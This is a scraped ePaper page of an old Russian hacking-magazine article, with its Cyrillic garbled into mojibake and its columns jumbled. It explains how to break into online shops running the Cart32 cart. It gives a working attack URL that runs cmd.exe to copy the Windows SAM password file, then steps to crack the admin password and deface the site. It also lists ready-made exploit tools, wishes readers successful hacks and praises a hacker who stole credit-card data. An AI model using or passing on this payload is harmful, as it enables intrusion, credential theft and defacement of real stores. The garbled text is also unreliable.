сишься, что левые трояны, вирусы и всякая про ... - Xakep Online
сишься, что левые трояны, вирусы и всякая про ... - Xakep Online
сишься, что левые трояны, вирусы и всякая про ... - Xakep Online
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
ìîæíî çàñòàâèòü âûäàòü ñîäåðæàíèå ëþáîãî<br />
ôàéëà! À åñëè ìîæíî ïîëó÷èòü ñîäåðæèìîå ëþáîãî<br />
ôàéëà, òî ìîæíî ïîñìîòðåòü è<br />
C:\WinNT\repair\sam._, ãäå õðàíÿòñÿ ïàðîëè. Íó<br />
à ñ ýòèìè-òî ïàðîëÿìè ìîæíî ÂѨ.<br />
Êàê ýòî ñäåëàòü?<br />
INSCENE MAN<br />
Ðóññêèé õàêåð, àâòîð ñàìîãî<br />
ãðîìêîãî âçëîìà îíëàéíîâîãî<br />
ìàãàçèíà.<br />
Ýòî òîæå äåëàåòñÿ ÷åðåç áðàóçåð, ïðè÷åì áåç<br />
âñÿêèõ html’îâ, îäíîé ñòðîêîé. Âîò îíà:<br />
http://www.victim.com/scripts/cart32/c32web.ex<br />
 19 ëåò ïîä Ðîæäåñòâî-1999 âçëîìàë áàçó äàííûõ ìóçûêàëüíîãî ìàãàçèíà<br />
CDuniverse.com è ïîõèòèë èíôîðìàöèþ î êðåäèòíûõ êàðòàõ 300 òûñÿ÷ ïîêóïàòåëåé.<br />
Ïîòðåáîâàë 100 òûñÿ÷ äîëëàðîâ “îòñòóïíûõ”. Íà îòêàç îòðåàãèðîâàë îòêðûòèåì ïî àäðåñó www.pcradio.com/maxus.htm<br />
ìàãàçèíà ñ àññîðòèìåíòîì â 25,000 “æèâûõ” êàðò áåñïëàòíî è ïî $1 çà øòóêó. Äåíüãè<br />
ïåðåâîäèëèñü íà ñ÷åò â ðèæñêîì Hansabanka Bank.<br />
 èíòåðâüþ New York Times, NBC è SecurityFocus.com ïðèâåë äîêàçàòåëüñòâà âçëîìà è ðàññêàçàë, ÷òî èñïîëüçîâàë<br />
äûðó â ïðîöåññèíãîâîì ïðèëîæåíèè ICVerify. Ðóêîâîäñòâî Cybercash âñå îïðîâåðãàëî. Discover<br />
Card, American Express è ðÿä àìåðèêàíñêèõ áàíêîâ-ýìèòåíòîâ Visa è MasterCard áûëè âûíóæäåíû ïåðåâûïóñòèòü<br />
äåñÿòêè òûñÿ÷ êàðò.<br />
Ïðè ñîäåéñòâèè Anti<strong>Online</strong>.com ÔÁÐ â òå÷åíèå íåäåëè óñòàíîâèëî ëè÷íîñòü õàêåðà è åãî âåðîÿòíîãî íàïàðíèêà<br />
- Åâãåíèÿ Ôåäîðîâà (aka Diagnoz). Îäíàêî, ïî èíôîðìàöèè USA Today, APB News è èñòî÷íèêîâ, áëèçêèõ<br />
ê ÔÁÐ, àðåñòîâ â ýòîé èñòîðèè íå ïîñëåäîâàëî.<br />
Àãåíòñòâî ZDNet íàçâàëî äîñòèæåíèå Ìàêñóñà â òîï-äåñÿòêå ãðîìêèõ âçëîìîâ 2000 ãîäà.<br />
Õîááè - äèäæåéñòâî.<br />
Îò Ñèíòåçà: íåñêîëüêî ëåò íàçàä (êàæåòñÿ, ýòî áûë 97-é ãîä) ÿ òóñîâàëñÿ ñ Äèàãíîçîì è äðóãèìè ðåáÿòàìè<br />
ýòîé òóñû â Ïèòåðå. Îòëè÷íûå ïàðíè, ëþáÿò êëóáèòüñÿ. ß áû ìîã èõ íàçâàòü “ýòàëîíîì” ìîåãî ïîíèìàíèÿ õàêåðà.<br />
Ìîëîäûå, âåñåëûå, ìîäíûå, õàéòåêîâñêèå, ê òîìó æå, î÷åíü íåïëîõî ðàçáèðàþùèåñÿ â êîìïàõ è òåõíîëîãèÿõ.<br />
e?TabName=Cart32%2B&Action=Save+Cart32%<br />
2B+Tab&SaveTab=Cart32%2B&Client=ËÎÃÈÍ&<br />
ClientPassword=ÏÀÐÎËÜ&Admin=&AdminPassw<br />
ord=&TabToSave=Cart32%2B&PlusTabToSave=<br />
Run+External+Program&UseCMDLine=Yes&CM<br />
DLine=cmd.exe+%2Fc+dir+%3E+c%3A%5CC:\<br />
WinNT\repair\sam._<br />
Âñå, îñòàëîñü òîëüêî ïîëîôòèòü ïàðîëü àäìèíà<br />
(ñîôò êà÷àåì ñ http://www.securitysoftwaretech.com),<br />
âîñïîëüçîâàòüñÿ èì è çàìåíèòü<br />
index.html. Äåôýéñ ãîòîâ.<br />
Buy or bye?<br />
Êàê ÿ è ïèñàë â íà÷àëå ñòàòüè, ýòî ïðîèçîøëî<br />
íå 3-4 ãîäà íàçàä, à ñðàâíèòåëüíî íåäàâíî.<br />
Ñàéòîâ, íà êîòîðûõ ñòîèò cart32, â Èíåòå ìîæíî<br />
íàéòè ñêîëüêî óãîäíî, òàê ÷òî âñå âûøåñêàçàííîå<br />
ìîæíî áåç òðóäà ïîâòîðèòü. Íà ýòîì ÿ è çàêîí÷ó,<br />
óäà÷íûõ õàêîâ è ìíîãî äûðÿâûõ ìàãàçÛíîâ<br />
òåáå :).<br />
Íàñ÷¸ò ãîòîâûõ ýêñïëîéòîâ<br />
äëÿ þçàíèÿ cart32, ÿ ãîòîâ<br />
ïðåäëîæèòü òåáå íåñêîëüêî<br />
ïîëåçíûõ ôèøåê.<br />
cart32scan.pl - ñêðèïò äëÿ<br />
ïîèñêà óñòàíîâëåííîé óÿçâèìîé<br />
êàðòî÷êè. Òàêæå ïîääåðæèâàåò<br />
ïðîâåðêó âåðñèè<br />
è ïðîèçâîäèò âûâîä î<br />
âîçìîæíîñòè âçëîìà ñåðâàêà<br />
ñ óñòàíîâëåííûì<br />
ñêðèïòîì.<br />
cart32scan.c - ïîïóëÿðíûé<br />
ýêñïëîéò, áîëåå ñåðü¸çíûé<br />
ïî ñîäåðæàíèþ, ÷åì ïðåäûäóùèé.<br />
Îïÿòü æå, óìååò ñêàíèðîâàòü<br />
ïîòðåáíûé ñàì äûðÿâûé<br />
ñêðèïò. Ñîçäàí ïî ìîòèâàì<br />
âåñòåðíà, ðàçâåðíóâøåãîñÿ<br />
â Áàãòðåêå =)<br />
wemilo.tcl ýêñïëîéò îò øèðîêîèçâåñòíîé<br />
@stake,<br />
ôóíêöèè ñõîæè ïðèñóùèì<br />
ïðåäûäóùèì. Âî, êàê ñêàçàë<br />
=)<br />
Îïèñàííûå ýêñïëîéòû ïîçâîëÿþò<br />
ïîëó÷èòü àäìèíèñòðàòîðñêèå<br />
ïîëíîìî÷èÿ, íà<br />
óïðàâëåíèå êîðçèíîé. È ñàìîå<br />
ãëàâíîå - äîñòóï ê ñîäåðæèìîìó<br />
êîðçèíû, êîòîðàÿ<br />
ïîñëå ïîñåùåíèÿ å¸<br />
õàöêåðîì, ïîëó÷èò ñâî¸ çàêîííîå<br />
èìÿ - ïîìîéêè 8)<br />
l0pht.00-04-27.cart32fix -<br />
ýêñêëþçèâíûé áàãôèêñ âñ¸<br />
îò òîé æå @stake, ïðàâäà,<br />
óæå ïîðÿäêîì óñòàðåâøèé.<br />
Ðåêîìåíäóåòñÿ òîëüêî äëÿ<br />
îáùåãî ðàçâèòèÿ. Èíòåðåñíî<br />
ïðîñëåäèòü ïîÿâëåíèÿ<br />
íåîôèöèàëüíîãî, opensource<br />
ïàò÷à íà ïîïóëÿðíóþ<br />
áàãó...